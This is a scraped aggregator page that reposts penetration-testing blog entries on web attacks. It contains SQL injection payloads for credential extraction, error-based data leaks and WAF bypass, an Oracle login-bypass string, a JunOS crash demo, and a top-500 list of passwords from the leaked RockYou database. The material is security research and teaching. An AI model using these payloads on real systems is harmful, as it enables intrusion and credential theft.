http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-01-12 14:19:31 - Positive Technologies Research Lab : An amusing attack was demonstrated in the course of the last penetration testing It is a good example of practical application of Cross-Site Scripting We had the following situation - User segment with an attacker me operating from it - Technological network with strictly restricted outgoing traffic - A web application in the technological network that is vulnerable to Remote File Including RFI - A web application in the technological network that is vulnerable to SQL Injection SQL Injection per se didn t allow us to exploit any useful threats and develop the attack here it is, the dreadful effect of privilege minimization We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented http param http param 1 union select '' That is, each of these tree vulnerabilities taken separately was useless Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server IMAGE All in all, there is nothing supernatural here, but I found this attack to be rather amusing http://www.secuobs.com/revue/news/180657.shtmlhttp://www.secuobs.com/revue/news/180657.shtml Secuobs.com : 2010-01-11 22:10:20 - Positive Technologies Research Lab - IMAGE In the course of the last penetration testing, I had an occasion to work with the following web application architecture I guess you will ask me, what s wrong here The problem is that Oracle is not MySQL, and it simply doesn t know about any shielding in the form of backlashes Oracle doesn t consider the concept of shielding at all, because it s a serious DBMS IMAGE It should be mentioned that we have met a lot of Oracle DBMSs during the last penetration testing, and most of them contained the described vulnerability, ie they had a universal login 'or 1 1 -- aka SQL Injection A similar feature of interpretation of a backslash as an independent symbol is characteristic for Microsoft SQL Server, too IMAGE For the Sybase database, we have IMAGE Thus, it is necessary to take such features of DBMSs into account in the course of programming and porting your applications to various databases to avoid problems relating to SQL Injection Comment this topic was described by Bernardo Damele 1,2 in his blog one year ago, but the practice shows that the problem is still urgent http://www.secuobs.com/revue/news/180386.shtmlhttp://www.secuobs.com/revue/news/180386.shtml Secuobs.com : 2010-01-11 11:43:55 - Positive Technologies Research Lab - A couple of days ago TinKode attracted everybody s attention by breaking a web site in the domain armymil The server onestoparmymil was attacked and the investigator found a Blind SQL Injection vulnerability on it A logically true query IMAGE A logically false query IMAGE This time, I was most interested not in the fact of server compromise, but in the applied technique of exploitation of Blind SQL Injection vulnerability at DBMS MSSQL 2000 IMAGE Thus, if casting via the function convert is unsuccessful, then MSSQL will place useful data into the error message Testing of a later version of MSSQL 2005 showed that the technique used by TinKode is applicable to it, too select convert int, version select convert int, select table_name from select row_number over order by table_name as rownum,table_name from information_schematables as t where trownum 1 select convert int, select table_name from select row_number over order by table_name as rownum,table_name from information_schematables as t where trownum 2 IMAGE Similar manipulations with casting were conducted for a widespread DBMS MySQL The experiment showed that in case of unsuccessful casting, MySQL returns a non-critical notification that cannot be used to achieve the same results for Blind SQL Injection exploitation mysql select cast 'str1' as char ---------------------- cast 'str1' as char ---------------------- str1 ---------------------- 1 row in set 000 sec mysql select cast 'str1' as decimal ------------------------- cast 'str1' as decimal ------------------------- 0 ------------------------- 1 row in set, 1 warning 001 sec mysql show warnings --------- ------ ------------------------------------------- Level Code Message --------- ------ ------------------------------------------- Warning 1292 Truncated incorrect DECIMAL value 'str1' --------- ------ ------------------------------------------- 1 row in set 000 sec mysql select convert 'str2',char ---------------------- convert 'str2',char ---------------------- str2 ---------------------- 1 row in set 000 sec mysql select convert 'str2',decimal ------------------------- convert 'str2',decimal ------------------------- 0 ------------------------- 1 row in set, 1 warning 000 sec mysql show warnings --------- ------ ------------------------------------------- Level Code Message --------- ------ ------------------------------------------- Warning 1292 Truncated incorrect DECIMAL value 'str2' --------- ------ ------------------------------------------- 1 row in set 000 sec Well and good But then, the universal exploitation technique by Qwazar is applicable to all MySQL versions select count ,concat version ,floor rand 0 2 x from table group by x select count ,concat select user from mysqluser limit 0,1 ,floor rand 0 2 x from mysqluser group by x select count ,concat select user from mysqluser limit 1,1 ,floor rand 0 2 x from mysqluser group by x select 1 and row 1,1 select count ,concat version ,0x3a,floor rand 2 x from select 1 union select 2 a group by x limit 1 IMAGE Using one such request, an attacker can obtain up to 64 bytes of useful data from the error message This technique can be used for MySQL v3x IMAGE Further experiments with the technique proposed by TinKode showed that this method can be applied to PostgreSQL, too select cast version as numeric select cast select table_name from information_schematables limit 1 offset 0 as numeric select cast select table_name from information_schematables limit 1 offset 1 as numeric IMAGE Like MSSQL, PostgreSQL doesn t seriously restrict the length of the data returned within an error message If the function pg_last_error is not called within the context of PHP, but error_reporting is still enabled, then one query allows an attacker to obtain up to 1229 bytes of useful data from the error message generated by PHP Unfortunately, such tricks will not work with Oracle IMAGE It is necessary to consider this DBMS http://www.secuobs.com/revue/news/180164.shtmlhttp://www.secuobs.com/revue/news/180164.shtml Secuobs.com : 2010-01-07 17:34:41 - Positive Technologies Research Lab - Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic - The Register news The JunOS kernel will crash ie core when a specifically crafted TCP option is received on a listening TCP port The packet cannot be filtered with Junos's firewall filter A router receiving this specific TCP packet will crash and reboot Affected Devices JunOS 3x - 10x versions released later then 1 28 2009 Software releases built on or after January 28, 2009 have already fixed the issueSolution Upgrade the OS There are no totally effective workarounds Funny A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory, the spokeswoman wrote Ooohhh How about this when a specifically crafted TCP option is received on a listening TCP port It's more than enough We have 256 guesses Simple Proof-of-Concept demo hod ping 16925411 PING 16925411 16925411 56 data bytes 64 bytes from 16925411 icmp_seq 0 ttl 254 time 4623 ms 64 bytes from 16925411 icmp_seq 1 ttl 254 time 4531 ms 64 bytes from 16925411 icmp_seq 2 ttl 254 time 4315 ms C hod hod-junos-test 16925411 22 Target IP 16925411, Port 22 Sending TCP-packets with various crafted TCP options TCP options bruteforce progress OK hod ping 16925411 PING 16925411 16925411 56 data bytes Request timeout for icmp_seq 0 Request timeout for icmp_seq 1 Request timeout for icmp_seq 2 C 256 packets and JunOS router is dead and after analyze sniffing traffic we are know true evil TCP packet The JUNOS firewall filter ACL is unable to filter a TCP packet with this issue Successful exploitation requires knowledge of a listening remote TCP port opened or firewall filtered, it doesn't matter at all For example, attackers can send blind a many number crafted packets to well known TCP ports 22 SSH, 179 BGP and other And That's enough http://www.secuobs.com/revue/news/179219.shtmlhttp://www.secuobs.com/revue/news/179219.shtml Secuobs.com : 2010-01-05 20:18:05 - Positive Technologies Research Lab - The Threat Classification is an effort to classify the weaknesses, and attacks that can lead to the compromise of a website, its data, or its users The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues WASC Threat Classification v20 Online http projectswebappsecorg Threat-Classification What's new in the Threat Classification v2 Expanded Mission Statement Clarified terminology Proper Classification of threats into Attacks and Weaknesses for static core view Base foundation allowing for the introduction of views into future releases http://www.secuobs.com/revue/news/178462.shtmlhttp://www.secuobs.com/revue/news/178462.shtml Secuobs.com : 2009-12-29 13:07:34 - Positive Technologies Research Lab - It was discovered that the hacker under the pseudonym igigi managed to compromise the database of users of the web site RockYoucom via classical SQL Injection exploitation The portal RockYoucom offers various services to social networks such as Facebook and MySpace Igigi describes in detail the conducted attack in his blog The most valuable data received by the hacker is the database of users consisting of 32 603 388 records Depersonalized database without usernames, emails, and other sensitive information was kindly downloaded to rapidsharecom, but has been already removed from there and is now available only on torrents It should be mentioned that this incident got into the TOP5 of the greatest information leakages for the past year The RockYou team apologized to their users and assured them that the incident didn t affect the privacy of their financial information It was also reported that the vulnerabilities will be eliminated and henceforth the security issues will be attended much more carefully compliance with industry standards in information security, applying best practices, etc However, information protection is based today on the principle one vulnerability eliminated, another one forgotten Well, let us return to the information leakage Yours truly couldn t help trying to get hold of such an interesting password database, which is now roaming in our boundless space Thus, I present to your attention the analysis of a scope of 32 603 388 passwords The results for the symbol set used charset are the following Here is a graph of the length of passwords used by foreign users Below is the most interesting thing - TOP500 of the most widespread passwords from the compromised database of RockYoucom password - percentage pourcents 1 123456 - 0,6547pourcents 2 password - 0,2789pourcents 3 iloveyou - 0,1791pourcents 4 princess - 0,1296pourcents 5 123456789 - 0,1131pourcents 6 12345 - 0,1106pourcents 7 rockyou - 0,0697pourcents 8 nicole - 0,0666pourcents 9 abc123 - 0,0657pourcents 10 monkey - 0,0648pourcents 11 ashley - 0,0593pourcents 12 babygirl - 0,0592pourcents 13 jessica - 0,0585pourcents 14 michael - 0,0555pourcents 15 tigger - 0,0547pourcents 16 soccer - 0,0535pourcents 17 michelle - 0,0526pourcents 18 password1 - 0,0522pourcents 19 sunshine - 0,0504pourcents 20 qwerty - 0,0486pourcents 21 iloveu - 0,0480pourcents 22 daniel - 0,0458pourcents 23 LOVELY - 0,0458pourcents 24 12345678 - 0,0456pourcents 25 FRIENDS - 0,0449pourcents 26 purple - 0,0448pourcents 27 jordan - 0,0440pourcents 28 anthony - 0,0436pourcents 29 justin - 0,0435pourcents 30 chocolate - 0,0432pourcents 31 butterfly - 0,0431pourcents 32 football - 0,0417pourcents 33 liverpool - 0,0409pourcents 34 bubbles - 0,0401pourcents 35 amanda - 0,0401pourcents 36 basketball - 0,0400pourcents 37 1234567 - 0,0399pourcents 38 jennifer - 0,0383pourcents 39 fuckyou - 0,0371pourcents 40 hottie - 0,0370pourcents 41 andrew - 0,0359pourcents 42 hannah - 0,0354pourcents 43 tweety - 0,0347pourcents 44 loveme - 0,0346pourcents 45 PLAYBOY - 0,0345pourcents 46 joshua - 0,0342pourcents 47 danielle - 0,0341pourcents 48 charlie - 0,0341pourcents 49 superman - 0,0340pourcents 50 chelsea - 0,0336pourcents 51 TINKERBELL - 0,0328pourcents 52 654321 - 0,0324pourcents 53 brandon - 0,0324pourcents 54 jasmine - 0,0320pourcents 55 softball - 0,0319pourcents 56 matthew - 0,0316pourcents 57 lauren - 0,0314pourcents 58 flower - 0,0314pourcents 59 EMINEM - 0,0313pourcents 60 angels - 0,0313pourcents 61 samantha - 0,0307pourcents 62 angel - 0,0305pourcents 63 secret - 0,0302pourcents 64 whatever - 0,0299pourcents 65 elizabeth - 0,0297pourcents 66 summer - 0,0287pourcents 67 melissa - 0,0286pourcents 68 taylor - 0,0282pourcents 69 cookie - 0,0282pourcents 70 hello - 0,0280pourcents 71 shadow - 0,0278pourcents 72 pretty - 0,0274pourcents 73 robert - 0,0272pourcents 74 dancer - 0,0272pourcents 75 yellow - 0,0270pourcents 76 computer - 0,0264pourcents 77 111111 - 0,0263pourcents 78 000000 - 0,0254pourcents 79 mickey - 0,0253pourcents 80 spongebob - 0,0252pourcents 81 iloveme - 0,0247pourcents 82 barbie - 0,0246pourcents 83 poohbear - 0,0245pourcents 84 andrea - 0,0244pourcents 85 loveyou - 0,0243pourcents 86 family - 0,0242pourcents 87 thomas - 0,0242pourcents 88 lovers - 0,0240pourcents 89 JONATHAN - 0,0239pourcents 90 brittany - 0,0236pourcents 91 joseph - 0,0235pourcents 92 rangers - 0,0235pourcents 93 shorty - 0,0231pourcents 94 123123 - 0,0229pourcents 95 william - 0,0228pourcents 96 heather - 0,0226pourcents 97 louise - 0,0225pourcents 98 forever - 0,0224pourcents 99 myspace - 0,0221pourcents 100 carlos - 0,0220pourcents 101 patrick - 0,0218pourcents 102 orange - 0,0217pourcents 103 princess1 - 0,0216pourcents 104 alexis - 0,0216pourcents 105 buster - 0,0213pourcents 106 destiny - 0,0211pourcents 107 nathan - 0,0211pourcents 108 diamond - 0,0211pourcents 109 CHEESE - 0,0211pourcents 110 pictures - 0,0209pourcents 111 chicken - 0,0207pourcents 112 rachel - 0,0207pourcents 113 blink182 - 0,0206pourcents 114 steven - 0,0204pourcents 115 babygurl - 0,0202pourcents 116 ginger - 0,0202pourcents 117 arsenal - 0,0201pourcents 118 junior - 0,0201pourcents 119 maggie - 0,0201pourcents 120 dolphin - 0,0201pourcents 121 dragon - 0,0200pourcents 122 sweety - 0,0199pourcents 123 hunter - 0,0198pourcents 124 snoopy - 0,0197pourcents 125 pepper - 0,0196pourcents 126 peanut - 0,0195pourcents 127 cherry - 0,0194pourcents 128 beautiful - 0,0194pourcents 129 richard - 0,0193pourcents 130 vanessa - 0,0193pourcents 131 baseball - 0,0192pourcents 132 rainbow - 0,0191pourcents 133 STEPHANIE - 0,0189pourcents 134 kisses - 0,0189pourcents 135 bailey - 0,0189pourcents 136 angela - 0,0188pourcents 137 madison - 0,0186pourcents 138 greenday - 0,0185pourcents 139 morgan - 0,0183pourcents 140 alyssa - 0,0183pourcents 141 sweetie - 0,0180pourcents 142 christian - 0,0178pourcents 143 george - 0,0178pourcents 144 jesus - 0,0178pourcents 145 courtney - 0,0177pourcents 146 iloveyou2 - 0,0175pourcents 147 shannon - 0,0173pourcents 148 tiffany - 0,0170pourcents 149 sophie - 0,0169pourcents 150 angel1 - 0,0168pourcents 151 JEREMY - 0,0167pourcents 152 chris - 0,0166pourcents 153 iloveyou1 - 0,0165pourcents 154 jessie - 0,0165pourcents 155 peaches - 0,0165pourcents 156 mylove - 0,0165pourcents 157 victoria - 0,0165pourcents 158 austin - 0,0165pourcents 159 heaven - 0,0162pourcents 160 asshole - 0,0161pourcents 161 november - 0,0160pourcents 162 celtic - 0,0159pourcents 163 love - 0,0158pourcents 164 booboo - 0,0158pourcents 165 horses - 0,0158pourcents 166 monica - 0,0158pourcents 167 bowwow - 0,0157pourcents 168 alexander - 0,0154pourcents 169 batman - 0,0153pourcents 170 adrian - 0,0153pourcents 171 killer - 0,0153pourcents 172 123abc - 0,0152pourcents 173 JESUS1 - 0,0152pourcents 174 rebecca - 0,0151pourcents 175 jackie - 0,0151pourcents 176 december - 0,0151pourcents 177 harley - 0,0151pourcents 178 volleyball - 0,0150pourcents 179 666666 - 0,0148pourcents 180 natalie - 0,0148pourcents 181 cameron - 0,0148pourcents 182 scooby - 0,0148pourcents 183 crystal - 0,0147pourcents 184 precious - 0,0146pourcents 185 beauty - 0,0146pourcents 186 mother - 0,0146pourcents 187 kissme - 0,0144pourcents 188 johnny - 0,0143pourcents 189 martin - 0,0142pourcents 190 sakura - 0,0141pourcents 191 bitch - 0,0140pourcents 192 banana - 0,0140pourcents 193 gemini - 0,0139pourcents 194 mustang - 0,0139pourcents 195 orlando - 0,0139pourcents 196 miguel - 0,0138pourcents 197 october - 0,0137pourcents 198 david - 0,0137pourcents 199 james - 0,0137pourcents 200 babygirl1 - 0,0136pourcents 201 september - 0,0136pourcents 202 alexandra - 0,0136pourcents 203 tigers - 0,0136pourcents 204 casper - 0,0135pourcents 205 1234567890 - 0,0135pourcents 206 cassie - 0,0134pourcents 207 christopher - 0,0134pourcents 208 monkey1 - 0,0134pourcents 209 cutiepie - 0,0134pourcents 210 school - 0,0133pourcents 211 50cent - 0,0133pourcents 212 hotmail - 0,0133pourcents 213 gabriel - 0,0133pourcents 214 oliver - 0,0132pourcents 215 aaliyah - 0,0132pourcents 216 honey - 0,0132pourcents 217 slideshow - 0,0132pourcents 218 jasper - 0,0131pourcents 219 nicholas - 0,0131pourcents 220 america - 0,0131pourcents 221 kimberly - 0,0131pourcents 222 kitten - 0,0131pourcents 223 blondie - 0,0130pourcents 224 smokey - 0,0130pourcents 225 BROOKE - 0,0130pourcents 226 patricia - 0,0130pourcents 227 hellokitty - 0,0129pourcents 228 jordan23 - 0,0128pourcents 229 sarah - 0,0127pourcents 230 POOKIE - 0,0126pourcents 231 antonio - 0,0126pourcents 232 babyboy - 0,0126pourcents 233 sayang - 0,0126pourcents 234 FREEDOM - 0,0125pourcents 235 august - 0,0124pourcents 236 fuckoff - 0,0124pourcents 237 babyblue - 0,0123pourcents 238 slipknot - 0,0123pourcents 239 Brianna - 0,0123pourcents 240 denise - 0,0122pourcents 241 travis - 0,0122pourcents 242 naruto - 0,0122pourcents 243 SANDRA - 0,0121pourcents 244 silver - 0,0121pourcents 245 charmed - 0,0121pourcents 246 carolina - 0,0121pourcents 247 121212 - 0,0121pourcents 248 strawberry - 0,0120pourcents 249 superstar - 0,0120pourcents 250 spiderman - 0,0120pourcents 251 monique - 0,0120pourcents 252 dolphins - 0,0119pourcents 253 apples - 0,0119pourcents 254 kenneth - 0,0119pourcents 255 flowers - 0,0119pourcents 256 cuteako - 0,0119pourcents 257 icecream - 0,0118pourcents 258 chester - 0,0118pourcents 259 prince - 0,0117pourcents 260 olivia - 0,0117pourcents 261 fucker - 0,0117pourcents 262 edward - 0,0116pourcents 263 myspace1 - 0,0115pourcents 264 alicia - 0,0115pourcents 265 eeyore - 0,0115pourcents 266 michael1 - 0,0115pourcents 267 newyork - 0,0114pourcents 268 ronaldo - 0,0114pourcents 269 midnight - 0,0114pourcents 270 friend - 0,0114pourcents 271 lollipop - 0,0114pourcents 272 adidas - 0,0113pourcents 273 jackson - 0,0113pourcents 274 master - 0,0113pourcents 275 gangsta - 0,0113pourcents 276 inuyasha - 0,0112pourcents 277 mahalkita - 0,0112pourcents 278 chrisbrown - 0,0112pourcents 279 stephen - 0,0112pourcents 280 nicole1 - 0,0112pourcents 281 muffin - 0,0111pourcents 282 skittles - 0,0111pourcents 283 lakers - 0,0111pourcents 284 christine - 0,0110pourcents 285 angelo - 0,0110pourcents 286 PIGLET - 0,0109pourcents 287 cutie - 0,0109pourcents 288 minnie - 0,0109pourcents 289 samsung - 0,0109pourcents 290 BROOKLYN - 0,0108pourcents 291 charles - 0,0108pourcents 292 JANUARY - 0,0107pourcents 293 dakota - 0,0107pourcents 294 mahalko - 0,0106pourcents 295 ladybug - 0,0106pourcents 296 kelsey - 0,0106pourcents 297 chris1 - 0,0106pourcents 298 cookies - 0,0106pourcents 299 rebelde - 0,0106pourcents 300 anthony1 - 0,0106pourcents 301 manuel - 0,0105pourcents 302 pokemon - 0,0105pourcents 303 marcus - 0,0105pourcents 304 INTERNET - 0,0105pourcents 305 westlife - 0,0105pourcents 306 pimpin - 0,0105pourcents 307 jason - 0,0105pourcents 308 pamela - 0,0104pourcents 309 iverson - 0,0104pourcents 310 catherine - 0,0104pourcents 311 babydoll - 0,0104pourcents 312 popcorn - 0,0103pourcents 313 snickers - 0,0103pourcents 314 manutd - 0,0103pourcents 315 smiley - 0,0103pourcents 316 omarion - 0,0103pourcents 317 dennis - 0,0103pourcents 318 hockey - 0,0102pourcents 319 mybaby - 0,0102pourcents 320 angelica - 0,0102pourcents 321 shelby - 0,0102pourcents 322 fluffy - 0,0102pourcents 323 daniela - 0,0102pourcents 324 katie - 0,0102pourcents 325 789456 - 0,0102pourcents 326 benjamin - 0,0102pourcents 327 ihateyou - 0,0102pourcents 328 elephant - 0,0101pourcents 329 marvin - 0,0101pourcents 330 scooter - 0,0101pourcents 331 bitch1 - 0,0101pourcents 332 garfield - 0,0101pourcents 333 123321 - 0,0100pourcents 334 scorpio - 0,0100pourcents 335 veronica - 0,0100pourcents 336 5201314 - 0,0100pourcents 337 987654321 - 0,0099pourcents 338 princesa - 0,0099pourcents 339 jeffrey - 0,0099pourcents 340 katherine - 0,0099pourcents 341 loser - 0,0098pourcents 342 christina - 0,0098pourcents 343 melanie - 0,0098pourcents 344 ricardo - 0,0098pourcents 345 mexico - 0,0098pourcents 346 112233 - 0,0098pourcents 347 kevin - 0,0098pourcents 348 nirvana - 0,0098pourcents 349 samuel - 0,0098pourcents 350 sabrina - 0,0097pourcents 351 159753 - 0,0097pourcents 352 rockstar - 0,0097pourcents 353 scotland - 0,0097pourcents 354 teamo - 0,0097pourcents 355 england - 0,0097pourcents 356 harrypotter - 0,0097pourcents 357 johncena - 0,0096pourcents 358 victor - 0,0096pourcents 359 raymond - 0,0096pourcents 360 britney - 0,0096pourcents 361 turtle - 0,0096pourcents 362 vincent - 0,0096pourcents 363 tequiero - 0,0095pourcents 364 frankie - 0,0095pourcents 365 Francis - 0,0095pourcents 366 YANKEES - 0,0095pourcents 367 welcome - 0,0095pourcents 368 soccer1 - 0,0094pourcents 369 zxcvbnm - 0,0094pourcents 370 charlotte - 0,0094pourcents 371 hottie1 - 0,0094pourcents 372 cristina - 0,0094pourcents 373 bonnie - 0,0094pourcents 374 FERNANDO - 0,0094pourcents 375 bianca - 0,0094pourcents 376 bubble - 0,0093pourcents 377 tintin - 0,0093pourcents 378 letmein - 0,0093pourcents 379 jayjay - 0,0093pourcents 380 CARMEN - 0,0093pourcents 381 shopping - 0,0093pourcents 382 estrella - 0,0093pourcents 383 maganda - 0,0093pourcents 384 sweet - 0,0092pourcents 385 swimming - 0,0092pourcents 386 single - 0,0092pourcents 387 tennis - 0,0092pourcents 388 winnie - 0,0091pourcents 389 696969 - 0,0091pourcents 390 number1 - 0,0091pourcents 391 123456a - 0,0091pourcents 392 red123 - 0,0091pourcents 393 rockon - 0,0091pourcents 394 london - 0,0090pourcents 395 people - 0,0090pourcents 396 dallas - 0,0090pourcents 397 christ - 0,0090pourcents 398 fuckyou1 - 0,0090pourcents 399 cancer - 0,0090pourcents 400 asdfgh - 0,0090pourcents 401 pumpkin - 0,0090pourcents 402 claudia - 0,0089pourcents 403 iloveu2 - 0,0089pourcents 404 love123 - 0,0089pourcents 405 natasha - 0,0089pourcents 406 player - 0,0089pourcents 407 brandy - 0,0089pourcents 408 justin1 - 0,0089pourcents 409 portugal - 0,0089pourcents 410 simple - 0,0089pourcents 411 katrina - 0,0089pourcents 412 FLORIDA - 0,0089pourcents 413 monkeys - 0,0088pourcents 414 teddybear - 0,0088pourcents 415 emily - 0,0088pourcents 416 lucky1 - 0,0088pourcents 417 megan - 0,0088pourcents 418 marie - 0,0088pourcents 419 Barney - 0,0088pourcents 420 dexter - 0,0088pourcents 421 badboy - 0,0087pourcents 422 sparky - 0,0087pourcents 423 stupid - 0,0087pourcents 424 hiphop - 0,0087pourcents 425 millie - 0,0087pourcents 426 987654 - 0,0087pourcents 427 smiles - 0,0087pourcents 428 nikki - 0,0087pourcents 429 MERCEDES - 0,0086pourcents 430 Claire - 0,0086pourcents 431 abigail - 0,0086pourcents 432 alejandro - 0,0086pourcents 433 california - 0,0086pourcents 434 mariah - 0,0086pourcents 435 ilovehim - 0,0086pourcents 436 raiders - 0,0086pourcents 437 JEROME - 0,0086pourcents 438 julian - 0,0086pourcents 439 brandon1 - 0,0085pourcents 440 lalala - 0,0085pourcents 441 smile - 0,0085pourcents 442 isabel - 0,0085pourcents 443 lindsey - 0,0085pourcents 444 laura - 0,0085pourcents 445 hearts - 0,0084pourcents 446 mariposa - 0,0084pourcents 447 lover - 0,0084pourcents 448 savannah - 0,0084pourcents 449 carebear - 0,0084pourcents 450 gracie - 0,0084pourcents 451 westside - 0,0084pourcents 452 jackass - 0,0084pourcents 453 elijah - 0,0084pourcents 454 disney - 0,0084pourcents 455 jamie - 0,0083pourcents 456 allison - 0,0083pourcents 457 bradley - 0,0083pourcents 458 kristen - 0,0083pourcents 459 guitar - 0,0083pourcents 460 timothy - 0,0083pourcents 461 Billabong - 0,0083pourcents 462 baller - 0,0083pourcents 463 METALLICA - 0,0083pourcents 464 rabbit - 0,0083pourcents 465 babyko - 0,0083pourcents 466 gandako - 0,0083pourcents 467 robbie - 0,0083pourcents 468 leslie - 0,0083pourcents 469 lindsay - 0,0083pourcents 470 amber - 0,0083pourcents 471 7777777 - 0,0083pourcents 472 truelove - 0,0082pourcents 473 hello1 - 0,0082pourcents 474 benfica - 0,0082pourcents 475 tyler - 0,0082pourcents 476 bandit - 0,0081pourcents 477 jayson - 0,0081pourcents 478 dustin - 0,0081pourcents 479 jayden - 0,0081pourcents 480 pebbles - 0,0081pourcents 481 sweets - 0,0081pourcents 482 alejandra - 0,0081pourcents 483 trinity - 0,0081pourcents 484 dance - 0,0081pourcents 485 sweetheart - 0,0080pourcents 486 kitty - 0,0080pourcents 487 hahaha - 0,0080pourcents 488 222222 - 0,0080pourcents 489 tigger1 - 0,0080pourcents 490 abcdef - 0,0079pourcents 491 albert - 0,0079pourcents 492 jordan1 - 0,0079pourcents 493 ronald - 0,0079pourcents 494 kathleen - 0,0079pourcents 495 sexygirl - 0,0079pourcents 496 sebastian - 0,0079pourcents 497 froggy - 0,0079pourcents 498 ashley1 - 0,0079pourcents 499 charlie1 - 0,0079pourcents 500 sunshine1 - 0,0079pourcents More interesting comparative analysis of all available password scopes will be published in the beginning of the next year within the bounds of Analysis of password protection issues and not only in Russian companies http://www.secuobs.com/revue/news/176378.shtmlhttp://www.secuobs.com/revue/news/176378.shtml Secuobs.com : 2009-12-28 13:28:40 - Positive Technologies Research Lab - The idea to use HTTP Parameter Fragmentation HPF when calling a web application for the purpose of bypassing security filters particularly, WAFs is not a new one According to one of the participants of WASC Mailing List, this technique can be occasionally found among exploits published at the site milw0rmcom However, application of this method allows one to successfully bypass filters used in most modern WAFs particularly, a productive one - mod_security So, what is the essence of this technique Let us consider it by examples of SQL Injection exploitation It is often necessary to have two or more user parameters in one SQL query, for example At the stage of verifying the parameter values received from the user on the level of web application, the application is capable of operating with variables of web server only and WAF depending on the mode is capable of operating directly with raw HTTP data However, regardless of the method of accessing data, it comes to using certain regular expressions regexps for each separate parameter Ie Thus, if one divides the logic of the SQL query among several parameters that enter this SQL query and then concatenates these pieces using comments, it will become possible to bypass the described filters a 1 union b select 1,2 a 1 union b select 1,pass c from users Here, regexps will not work SQL queries become Since comments are ignored, the queries in fact are select from table where a 1 union select 1,2 select from table where a 1 union select 1,pass from users One can notice that considering the attack vector, HPF is very similar to HPP HTTP Parameter Pollution , but in contrast to the latter one, the HPP implementation is aimed at exploitation of vulnerability in the web application, not in the application environment Of course, both attack methods can supplement each other For example, combination of two techniques can be used if SQL code is sequentially injected into two SQL queries Let us assume that output is displayed only if both queries don t return a DB error Then it becomes possible to combine HPP and HPF methods and use union instead of Blind SQL Injection Here is an example a 1 union a select 1,2 b ,3 SQL queries will take on a correct form select id,user,email from table where a 1 union select 1,2,3 select id,user from table where a 1 union select 1,2 Sources antichat http forumantichatru showpostphp p 911841 postcount 2 antichat http forumantichatru showpostphp p 970729 postcount 3 OWASP EU09 Luca Carettoni, Stefano diPaola http wwwowasporg images b ba AppsecEU09_CarettoniDiPaola_v08pdf Lavakumar Kuppan, http lavakumarcom Split_and_Joinpdf WASC Mailing List, http wwwwebappsecorg lists websecurity archive 2009-08 msg00080html CC09 Dmitry Evteev, http wwwptsecuritycom download PT-devteev-CC-WAF-ENGpdf Dmitry Evteev blog, http devteevblogspotcom 2009 09 http-parameter-fragmentation-hpf-webhtml http://www.secuobs.com/revue/news/176109.shtmlhttp://www.secuobs.com/revue/news/176109.shtml Secuobs.com : 2009-12-24 12:31:49 - Positive Technologies Research Lab - Introduction SQL Injection is a method to attack a database bypassing firewalls In this method, parameters transmitted to the database via web applications are modified so that the executable SQL query changes To conduct an SQL Injection attack, every possible way to interact with the application GET, POST, COOKIE, etc is used Attacks can be conducted for the following purposes 1 Access data that is usually inaccessible or obtain system configuration data, which can be used to develop the attack vector For example, a modified SQL query returns user password hashes, which are subsequently decrypted using brute-force search 2 Access other systems through the computer storing a database This sort of attacks can be conducted using database procedures and 3GL extensions that allow one to interact with operating and file systems SQL Injections can be divided into the following three groups according to the exploitation techniques 1 Classical SQL Injection 2 Blind SQL Injection 3 Double Blind SQL Injection TIME-based Let us consider each of these techniques in detail Taking into account the fact that SQL Injection exploitation strongly depends on the features of the structured query language SQL used, we will confine ourselves to considering the most widespread database MySQL Moreover, we will assume that SQL Injection attack is conducted via SELECT query, not via INSERT or others Classical SQL Injection In the first place, classical exploitation of SQL Injection vulnerabilities provides an opportunity to merge two SQL queries for the purpose of obtaining additional data from a certain table If it is possible to conduct a classical SQL Injection attack, then it becomes much easier to get useful information from the database management system DBMS Attacks of this type usually exploit the union operator If the body of the returned page can include only one entry from the table, one can use the technique of line-by-line reading id 1 limit 0 union select login,password from users limit 0,1 id 1 limit 0 union select login,password from users limit 1,1 Or id 1 limit 0 union select login,password from users limit 1 offset 0 id 1 limit 0 union select login,password from users limit 1 offset 1 Admittedly, obtaining data from a large table represents a rather long process if such approach is used Therefore, when the user whose account is used to execute queries to MySQL has file_priv privileges, it becomes possible to output the SELECT query into a file id 1 limit 0 union select login,password from users into outfile ' tmp users' or id 1 limit 0 union select login,password from users into dumpfile ' tmp users' Actually, ability to work with the file system during SQL Injection exploitation represents a step towards the ability to execute commands on server This is why SQL Injection vulnerabilities belong to the class of Command Execution in standard terminology When the SQL query used for injection is executed for a table with limited number of columns, one can use the functions of data concatenation, such as concat and concat_ws id 1 limit 0 union select concat login,password from users id 1 union select concat_ws ' ',login,password from users In cases when the injected query is followed by the remains of the good SQL query, one can remove this garbage using comments id 1 union select login,password from users-- id 1 union select login,password from users id 1 union select login,password from users Everything was simple and easy until the moment when severe administrators started using various security filters aka WAFs, Web Application Firewalls to protect vulnerable web applications These filters generally apply signature analysis, which represents their central failure In many cases, capabilities of SQL allow one to bypass filtering of incoming data For example, it is amusing to observe that KIS 2009 forbids this query id 1 union select password from users while the following queries are let through without any response id 1 union select passwd from users id 1 union select pass from users id 1 union select password from user id 1 union select login from users-- et alia But what can we do if it is necessary to use exactly the column called password and the table called users One possible way is to exploit the vulnerability using blind method id 1 and 1 if ord lower mid select password from users limit 0,1 ,1,1 NUM,1,2 -- In this case, KIS filter is bypassed even smarter The signature reacts only to the strings password and users that follow the key word union In consideration of this peculiarity, we can build the following query that will bypass the filter id 1 and select v password from users limit 0,1 union select v-- id 1 and select v password from users limit 1,1 union select v-- etc However, sometimes it is impossible to influence the data returned by the application during conduction of an SQL Injection attack In these cases, the vulnerability is called blind It should be mentioned that this is the technique of Blind SQL Injection exploitation that allows one to bypass most filters including WAFs easily Blind SQL Injection Blind SQL Injection appears when the vulnerable query reflects the application logic, but doesn't allow one to 